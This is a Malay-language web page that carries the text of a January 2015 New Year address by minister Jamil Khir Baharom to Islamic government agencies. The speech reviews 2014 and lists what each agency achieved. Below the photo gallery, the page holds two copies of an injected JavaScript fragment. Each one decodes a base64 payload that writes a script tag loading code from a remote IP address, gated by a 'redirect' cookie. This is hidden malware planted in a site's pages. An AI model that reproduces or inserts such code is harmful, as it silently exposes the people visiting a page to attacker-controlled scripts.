YaPEIM » Amanat Tahun Baru YB Mejar Jeneral Dato Seri Jamil Khir Bin Hj Baharom

Terkini

Amanat Tahun Baru YB Mejar Jeneral Dato Seri Jamil Khir Bin Hj Baharom

Ucapan Amanat Tahun Baru Oleh YB Mejar Jeneral Dato Seri Jamil Khir Bin Hj Baharom Dewan Muktamar Pusat Islam.

TEKS UCAPAN

Y.B MEJAR JENERAL DATO’ SERI JAMIL KHIR

BIN HJ BAHAROM (B)

MENTERI DI JABATAN PERDANA MENTERI 

MAJLIS PERHIMPUNAN AGENSI DI BAWAH MENTERI DI JPM

DEWAN MUKTAMAR PUSAT ISLAM

JABATAN AGAMA ISLAM WILAYAH PERSEKUTUAN 

27 JANUARI 2015 (SELASA)

1.         Alhamdulillah, setinggi-tinggi kesyukuran dirafa’kan kepada Allah SWT kerana dengan rahmah dan inayah-Nya, diizinkan kita semua untuk berkumpul di auditorium ini bagi menyempurnakan satu lagi tugas dan tanggugjawab kita untuk agama dan negara yang tercinta. Selawat dan salam dihadiahkan kepada junjungan besar Nabi Muhammad SAW, ahli keluarga dan para sahabat baginda yang telah banyak meninggalkan jasa bakti kepada seluruh umat Islam khasnya dan umat manusia amnya.

2.         Terlebih dahulu, saya merakamkan ucapan ribuan terima kasih atas kehadiran semua barisan kepimpinan dan pengurusan agensi-agensi Agama Islam di bawah Jabatan Perdana Menteri dan juga warga kakitangannya ke perhimpunan ini.

3.         Saya kira masih belum terlewat untuk saya mengucapkan Selamat Tahun Baru kepada seluruh warga agensi agama Islam Jabatan Perdana Menteri. Semoga tahun 2015 yang baru bermula ini membawa sinar kejayaan dan kecemerlangan kepada kita semua selaku warga agensi-agensi Islam yang dipertanggungjawabkan untuk melaksana amanah ummah dan negara, memartabatkan syiar Islam di negara Malaysia yang tercinta ini.

4.         Saya juga ingin mengambil kesempatan ini untuk mengucapkan tahniah dan setinggi-tinggi penghargaan kepada semua ketua-ketua Jabatan dan agensi atas kejayaan dalam mengurus pelaksanaan program dan aktiviti pada tahun 2014 yang lalu. Saya berharap segala pencapaian ini dapat terus dipertingkatkan seiring dengan hasrat untuk Memacu Transformasi Pengurusan Hal Ehwal Islam yang lebih cemerlang pada tahun 2015 ini.

5.         Jika kita imbas sejenak sepanjang tahun 2014 yang lalu, pastinya semua orang mengakui bahawa tahun 2014 adalah suatu tempoh perjalanan yang amat mencabar dan penuh dengan dugaan bagi kita warga Malaysia amnya dan umat Islam khususnya. Bermula seawal suku kedua tahun 2014 sehinggalah ke penghujung tahunnya, warga Malaysia diduga dan diuji dengan banyak kejadian yang besar dan amat menyedihkan sehingga ke peringkat kehilangan nyawa dan kematian di dalam jumlah yang ramai dan kemusnahan tempat tinggal serta kampung halaman. Tidak perlu saya sebut atau senaraikan semua kejadian dan peristiwa tersebut kerana ia telah menjadi pengetahuan umum bagi warga masyarakat yang prihatin dengan masalah dan negaranya.

6.         Seluruh warga Malaysia merasakan keperitan dan kesedihan ini tanpa mengira taraf kedudukan, bangsa, agama dan warna kulit. Apatah lagi bagi ahli keluarga dan rakan taulan yang terlibat dengan dugaan itu. Berat mata memandang, berat lagi bahu yang memikul. Bahkan negara kita telah menjadi perhatian liputan media luar negara dan mendapat simpati yang amat mengharukan daripada masyarakat antarabangsa. Pimpinan negara khususnya YAB Perdana Menteri menerima perutusan takziah daripada banyak negara-negara besar di dunia sebagai tanda simpati dan kebersamaan mereka dengan apa yang dialami oleh negara dan rakyat.

7.         Hakikatnya ternyata, kejadian dan dugaan yang diterima sepanjang 2014 mengandungi seribu satu pengajaran dan hikmah yang cukup bermakna kepada seluruh rakyat dan warga Malaysia samada di peringkat luar atau dalam negara. Ternyata, negara mempunyai hubungan yang baik dengan begitu banyak negara di peringkat  antarabangsa. Mereka bersama negara ketika susah dan senang. Hubungan yang rapat dan mesra secara peribadi pimpinan negara terutama YAB Perdana Menteri dan dasar luar negara yang pragmatik menjadikan negara kita sentiasa diambil perhatian negara luar. Bantuan dan pertolongan yang diterima daripada negara luar semasa menghadapi kesukaran dugaan tersebut bukan sedikit. Bahkan ianya melibatkan bantuan kemanusiaan dan logistik yang amat luar biasa.

8.         Perkara yang sama juga berlaku di dalam negara. Kejadian-kejadian tragis yang berlaku menjadikan kita bersatu dan bersama atas nama satu warganegara Malaysia, 1Malaysia, tanpa mengira bangsa, agama dan warna kulit. Kesedihan dan kesulitan sama-sama dirasai dan cuba dibantu serta diatasi dengan memberikan bantuan dan sokongan mengikut kekuatan dan kebolehan masing-masing. Saya berasa terharu dan berbangga dengan sikap pro aktif, respon segera dan tindakan yang diambil oleh jabatan dan agensi di bawah jagaan saya sepertimana yang dilakukan oleh Jakim yang menyedia dan menghantar pegawai agama dan imam ke lokasi dan negara berkenaan bagi membantu menguruskan urusan jenazah mangsa orang Islam di dalam tragedi MH17. Sumbangan ini turut mendapat perhatian YAB Perdana Menteri yang sudi menyampaikan surat penghargaan kepada para petugas yang terlibat.

9.         Begitu juga dengan tindakan dan bantuan kepada mangsa bencana banjir yang teruk di negeri-negeri pantai timur pada penghujung tahun yang lalu. Boleh dikatakan hampir keseluruhan jabatan dan agensi agama Islam terlibat seperti JAKIM, MAIWP, YaPEIM, JAWI, YADIM dan lain-lain bertindak dengan menyalurkan bantuan kewangan, pakaian, makanan dan barang-barang keperluan harian mangsa banjir dan menghantar sukarelawan kemanusiaan ke lokasi kejadian banjir. Saya berharap sumbangan tersebut sedikit sebanyak dapat menghilangkan kedukaan dan kesedihan mangsa banjir atas apa yang menimpa mereka sekaligus meningkatkan motivasi mangsa dan mengukuhkan keyakinan mereka kepada ketentuan qadha dan qadar Allah SWT.

10.       Biarpun dikejutkan dengan dugaan seumpama yang berlaku sepanjang tahun 2014 yang lalu, ternyata di sebalik semua dugaan tersebut saya tetap berasa bangga atas komitmen dan kesungguhan yang ditunjukkan oleh seluruh warga semua jabatan dan agensi agama Islam di bawah tanggungjawab saya selaku Menteri di JPM melaksanakan program dan aktiviti yang telah dirancang. Kejadian dan tragedi yang menimpa negara dan rakyat tidak banyak memberikan ganguan dan halangan pelaksanaan program yang dirancang sepanjang tahun 2014. Sebaliknya program dan aktiviti Jabatan / Agensi bagi tahun 2014 berjaya mencapai standard KPI yang boleh dibangga dan memuaskan.

11.       Alhamdulillah, walaupun sepanjang 2014 yang lalu pelbagai isu keagamaan timbul dalam masyarakat, namun atas kepekaan kita maka isu-isu tersebut dapat diurus dan ditangani dengan penuh bijaksana. Jadikanlah itu semua sebagai cabaran dan resam perjuangan yang akan lebih mematangkan kita, seterusnya menjadikan kita lebih kuat dan bersemangat untuk memartabat serta mempertahankan Islam di bumi Malaysia yang tercinta ini. Antara pencapaian dan kejayaan agensi agensi yang boleh saya sebutkan secara ringkas di sini ialah

Tabung Haji:

i. Berjaya mengekalkan tambang haji pada kadar RM9,980.00 walaupun kos pengendalian haji terus meningkat setiap tahun disebabkan peningkatan kos penginapan dan pengangkutan di Tanah Suci. Pada tahun 2014 sahaja, kos sebenar mengerjakan haji untuk seorang Jemaah Muassasah adalah sebanyak RM16,155 dan Tabung Haji menanggung kos haji sebanyak RM6,175 bagi seorang jemaah dengan jumlah keseluruhan sebanyak RM130 juta.

ii. Membayar bonus tahunan TH sebanyak 6.25% dan tambahan Bonus Haji sebanyak 2.0% untuk tahun 2014, kepada para pendeposit yang masih belum mengerjakan haji sebagai tanda keprihatinan kepada para pendeposit yang masih belum mampu menunaikan haji (jumlah 8.25%)

iii. Membuka sebanyak 41 operasi kaunter perkhidmatannya pada hari Sabtu pertama setiap bulan.

v. Tabung Haji juga telah turut serta dalam Urban Transformation Center (UTC) di enam (6) buah negeri bagi memberi akses tambahan kepada pendepositnya

Jabatan Kemajuan Islam Malaysia:

i. Jakim berjaya dinobatkan sebagai Jabatan Paling Inovatif bagi Anugerah Inovasi Jabatan Perdana Menteri bersempena Hari Inovasi dan Kecemerlangan Jabatan Perdana Menteri 2014. Disamping anugerah lain seperti JOHAN dalam Anugerah Inovasi JPM 2013 dalam kategori ICT melalui projek Jakim.TV, dan tempat KEDUA dalam Kategori Produk Harapan melalui Projek Diari Huffaz Darul Quran.

ii. Jakim telah meneroka prospek baru sasaran dakwah melalui strategi NBOS dengan pihak GLC’s seperti penubuhan Sekretariat Dakwah Korporat dan penganjuran Majlis Tilawah al-Quran GLC’s Peringkat Kebangsaan kali pertama.

iii. Komitmen dan kesungguhan warga JAKIM serta kejayaan melaksanakan pelbagai program dan aktiviti mendapat perhatian dan penghargaan pihak kerajaan dengan menaiktaraf beberapa perjawatan utama antaranya Ketua Jabatan telah dinaiktaraf jawatan Turus III (KUP), Imam Besar Masjid Negara ke Jawatan Jusa B, Imam Besar Masjid Putra ke Jawatan Jusa C dan lain-lain gred perjawatan.

Majlis Agama Islam Wilayah Persekutuan:

Bagi meningkatkan keberkesanan agihan zakat dan menambahbaik sistem penyampaian perkhidmatan MAIWP telah:

i. Memperkenalkan talian bebas tol 1-800-88-5222 bagi memudahkan orang ramai untuk menyalurkan maklumat tentang mereka yang memerlukan bantuan zakat.

ii. Membuka Pusat-pusat Agihan Zakat atau dikenali sebagai PAZA mengikut kawasan Parlimen di sekitar Wilayah Persekutuan. Sehingga kini terdapat 7 PAZA telah dibuka oleh MAIWP

iii. Penubuhan Skuad Jejak Asnaf telah diumumkan sebagai Naib Johan Anugerah Inovasi Jabatan Perdana Menteri 2013 bagi kategori Non ICT.

iv. Menyediakan kaunter Drive Thru Zakat Fitrah

v. MAIWP telah meluluskan peruntukan zakat sebanyak RM8 juta bagi membantu mangsa-mangsa banjir di negeri-negeri yang dilanda musibah berkenaan.

vi. Mengekalkan pencapaian menerima penarafan 4 Bintang bagi Indeks Akauntabiliti Pengurusan Kewangan untuk tahun ketiga berturut-turut dan sijil bersih bagi Penyata Kewangan MAIWP untuk tahun ke-8 berturut-turut;

vii. Jawatankuasa khas bagi mengkaji jawatan-jawatan tingkatan tertinggi (JKPP) yang dipengerusikan oleh Ketua Setiausaha Negara bersetuju dengan cadangan menaik taraf skim perkhidmatan bagi dua jawatan pengurusan tertinggi di MAIWP  seperti berikut;

a) Ketua Pegawai Eksekutif (CEO) kepada  Gred Utama C/B (ketika ini Gred Utama C).

b) Timbalan CEO kepada Gred 54/ Gred Utama C (2 jawatan), (ketika ini Gred 54).

YaPEIM

i. Mewujudkan 24 lagi cawangan Ar Rahnu YaPEIM (menjadikan semuanya 202 cawangan)

ii. Mewujudkan Pusat Pencerakinan Emas Tanpa Musnah atau NDAC (Non Destructive Assaying Centre)

iii. Membantu usahawan muslim di negara ini melalui konsep Pusat Setempat Promosi Produk Halal dan Produk Keluaran Usahawan Muslim, tiga buah pasar raya ditubuhkan oleh YaPEIM  yang dikenali sebagai YaPEIM S’MART.

YADIM

i. Menganjurkan program perhimpunan Kalimah Allah, persidangan Majlis Dakwah Negara dan Halaqah Perdana. Progam-program dijalankan melibatkan seluruh negeri termasuk Sabah dan Sarawak.

ii. Menganjurkan Karnival Hijrah bersama TV AlHijrah di empat negeri, Temasya Muamalah Islam, Anugerah Keluarga Mithali, Transformasi Diri, Celik Muamalah di 13 negeri, 13 siri Bicara Sakinah dan Wacana Pemantapan Akidah.

iii. Melahirkan pendakwah muda YADIM  dan melaksanakan program khusus untuk sasaran berkenaan termasuk 14 siri Nadwah Qiyadi, Jelajah Ilmu Mahasiswa Luar Negara, Jejak Menara dan Felo Muda Dakwah.

Jabatan Agama Islam Wilayah Persekutuan (JAWI)

i. Berjaya mendapat Pensijilan Amalan Persekitaran Berkualiti 5S oleh Perbadanan Produktiviti Malaysia (MPC) setelah lulus dengan cemerlang dalam sesi audit 5S pada 29 April 2014.

ii. Dua buah masjid di Wilayah Persekutuan telah diberi pengiktirafan dalam Anugerah Masjid Malaysia 2014 iaitu Masjid Usamah Bin Zaid, Wangsa Maju sebagai Naib Johan Kategori Masjid Daerah, dan Masjid Saidina Abu Bakar As-Siddiq, Jalan Ara, Bangsar sebagai Naib Johan Kategori Masjid Kariah.

iii. Membuat lonjakan dan peningkatan di dalam Ujian Pencapaian Sekolah Rendah Agama (UPSRA) bagi Sekolah Rendah Agama (SRA) di Wilayah Persekutuan dengan peratus kelulusan keseluruhan 91 peratus meningkat dua peratus berbanding tahun lalu iaitu hanya mencatatkan 89 peratus saja.

iv. Wilayah Persekutuan juga dinobatkan sebagai negeri terbaik dalam peperiksaan Ujian Penilaian Kelas al-Quran dan Fardhu Ain (UPKK) 2014 berdasarkan Gred Purata Nasional (GPN) dengan GPN 1.56.

Pejabat Mufti Wilayah Persekutuan

Melaksanakan pelbagai program kesedaran dan kefahaman Islam melalui bengkel dan seminar yang menyentuh isu-isu semasa seperti ajaran sesat, penyelewengan dan ekstremisme

Yayasan Wakaf Malaysia (YWM)

YWM telah mengambil langkah transformational dengan melaksanakan beberapa program pembangunan hartanah wakaf  berimpak besar antaranya menubuhkan Akademi Kulinari Terengganu, di Marang, Terengganu yang menawarkan kursus dalam bidang Confectionary & Bakery selama 6 bulan beserta asrama sepenuh masa kepada anak-anak asnaf negeri Terengganu.

Institut Kefahaman Islam Malaysia (IKIM)

i) Dua buah buku terbitan ikim telah memenangi ”Anugerah Buku Negara 2014” iaitu

a. An Islamic Paradigm In Economics Vision and Mission dan

b. Islamic Scientific Tradition in History, Alparslan Acikgenc

Anugerah telah disampaikan oleh YABhg Tun Abdullah Ahmad Badawi, Mantan Perdana Menteri Malaysia pada 11 Disember 2014, di PWTC Kuala Lumpur.

Penganjuran beberapa seminar seperti:

a) International Seminar On “Science For Sustainable Development: Islamic Perspective” pada 18-19 November 2014 bertempat di IKIM sendiri.

b) Kongres Kepimpinan Wanita Islam Peringkat Kebangsaan 2014, pada 19 Mac 2014 di Dewan Besar IKIM. Dianjurkan oleh IKIM dengan kerjasama JAKIM pada 19 Mac 2014.

c) Persidangan Meja Bulat “Pertumbuhan Sekolah Aliran Tahfiz Di Malaysia – Antara Aspirasi Murni Dan Hakikat Di Lapangan. Matlamat penganjurannya menyorot sejarah perkembangan sekolah-sekolah tahfiz di Malaysia, kedudukannya dalam sistem pendidikan negara dan pencapaiannya setakat ini; mengenalpasti punca peningkatan pertumbuhan sekolah-sekolah tahfiz akhir-akhir ini dan kenapa ibubapa menjadikannya pilihan.

d) IKIM juga telah berjaya menganjurkan  Majlis Anugerah Nasyid IKIMfm 2014 pada 10 Januari 2015 bertempat di Pusat Konvensyen Putrajaya.

TV Hijrah

i) Dokumentari terbitan TV Hijrah bertajuk “Dengan Berbasikal Aku Menjelajah” telah dipilih sebagai rancangan dokumentari terbaik di Anugerah Skrin 2014

ii) Telemovie “Matahari Terbit Lagi” dfipilih sebagai Drama Terbaik Anugerah Skrin 2014

iii) Kini program-program TV AlHijrah juga boleh ditonton semula dengan melanggan kepada  alhijrahmedia.com . satu kaedah tonton semula program-program yang tidak sempat kita tonton pada waktu siarannya.

iv) Catatan terkini sehingga 26 Januari 2015 – Facebook LIKES TV AlHijrah telah mencapai hampir 950,000 ( 946,230 ) – Menunjukkan peningkatan yang menggalakkan serta memberi gambaran penonton telah menerima baik kandungan yang berunsurkan agama Islam dan dahagakan ilmu ilmu Islam.

Jawhar

i) Penganjuran Seminar Wakaf Antarabangsa (SWA) 2014 pada 8 Disember 2014 bertempat di Hotel Istana, Kuala Lumpur. Seminar peringkat antarabangsa yang julung kali diadakan ini merupakan platform terbaik kepada semua agensi yang berkaitan wakaf dari dalam dan luar negara untuk berkongsi kepakaran dan pengalaman masing-masing dalam pembangunan hartanah wakaf yang berperanan sebagai pemangkin pembangunan sosio-ekonomi ummah.

ii)         Sambutan Bulan Zakat Kebangsaan 2014 bertempat di Hotel Sunway Putra, Kuala Lumpur dengan kerjasama Majlis Agama Islam Negeri (MAIN) dan Agensi Memungut Zakat (AMZ) seluruh negara pada 17 November 2014.

iii) JAWHAR telah dilantik sebagai ahli dalam Majlis Kawal Selia Umrah (MKSU) yang merupakan satu titik permulaan ke arah membanteras penipuan pakej umrah di Malaysia secara bersepadu lagi menyeluruh. Pada 28 Ogos 2014, MKSU telah dengan rasminya tertubuh melalui pengumuman YB Menteri Pelancongan.

12.       Demikianlah sebahagian daripada contoh kejayaan dan pencapaian pelaksanaan yang dilaksanakan oleh agensi-agensi berkenaan.

13.       Beberapa hari yang lalu, YAB Perdana Menteri telah menyampaikan Perutusan Khas Tentang Perkembangan Ekonomi Semasa serta Kedudukan Kewangan Negara. Di dalam ucapannya beliau mengumumkan beberapa langkah proaktif supaya pertumbuhan, pembangunan dan sasaran defisit fiskal negara dapat diteruskan berikutan perubahan landskap ekonomi global. Antara lain beliau menyatakan “bagi langkah merasionalisasi perbelanjaan pula, kerajaan akan mengoptimumkan perbelanjaan ke atas bekalan dan perkhidmatan, penganjuran majlis dan mesyuarat serta perkhidmatan profesional yang memberi penjimatan sebanyak RM1.6 bilion”.

14.       Saya merasakan apa yang dihasratkan oleh YAB Perdana Menteri di dalam ucapannya ini hendaklah diambil perhatian yang berat dan respon segera oleh semua ketua-ketua jabatan dan agensi dengan meneliti semula perancangan program dan aktiviti bagi tahun 2015 ini dan membuat penyesuaian yang wajar mengenai aspek perolehan dan perbelanjaan pelaksanaan program dan aktiviti jabatan bagi tahun ini.

15.       Beberapa hari sebelum itu, semasa berucap di dalam Majlis Perhimpunan YAB Perdana Menteri bersama warga Jabatan Perdana Menteri, beliau juga telah menarik perhatian saya apabila menyebut secara jelas agar Jabatan Kemajuan Islam Malaysia mengambil peranan dan tanggungjawab mengetuai program bagi memberikan penjelasan kepada masyarakat mengenai konsep jihad yang sebenar sebagai salah satu langkah menangani kekeliruan dan salah faham sebahagian ahli masyarakat mengenai Jihad di dalam Islam terutama di kalangan anak-anak muda yang mula tertarik dan terpengaruh dengan “seruan jihad” dan apa yang sedang berlaku di Syria, Iraq dan negara-negara timur tengah ketika ini. Perkara ini amat penting untuk diambil tindakan segera kerana jika dibiarkan ianya boleh menggugat dan mengancam keselamatan negara seluruhnya. Justeru itu, bagi melaksanakan amanah ini, saya berharap agar strategi NBOS bersama agensi-agensi kerajaan yang lain seperti PDRM, MKN dan sebagainya dapat dimanfaatkan dengan maksima dan sebaik mungkin.

16.       Satu perkara yang perlu juga diambil perhatian ialah aspek pengurusan maklumat dan dokumen rasmi dan rahsia kerajaan. Setiap ketua jabatan atau agensi agama Islam hendaklah memastikan penjagaan dokumen-dokumen rasmi atau rahsia yang berkaitan mestilah memenuhi kehendak SOP dan prosedur keselamatan yang telah ditetapkan. Kebocoran maklumat dan dokumen tersebut kepada pihak-pihak yang tidak perlu dan berkenaan adalah sesuatu yang mengecewakan jika ianya berlaku. Dibimbangi maklumat dan dokumen tersebut disalahguna untuk tujuan yang salah yang boleh menjejaskan nama baik jabatan dan sekaligus pihak kerajaan dan tidak mustahil boleh mengancam keharmonian hidup rakyat dan keselamatan negara.

17.       Akhir sekali, suka yang menarik perhatian seluruh kepimpinan dan ketua-ketua jabatan dan agensi agar memberikan fokus dan perhatian yang berat kepada KPI yang telah dicadang untuk dilaksanakan pada tahun 2015 ini. Kenalpasti program yang bersesuaian dan wajar untuk dilaksanakan terutama program / aktiviti yang memberikan impak besar dan bersifat inovatif yang menjadi touch-point masyarakat Islam.

18.       Akhir sekali, saya sekali lagi mengambil kesempatan ini untuk merakamkan ucapan ribuan terima kasih kepada pihak penganjur dan penyelaras serta semua yang terlibat menjayakan perhimpunan ini.

Galeri Gambar

 

 

 

 

 

 

 

 

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top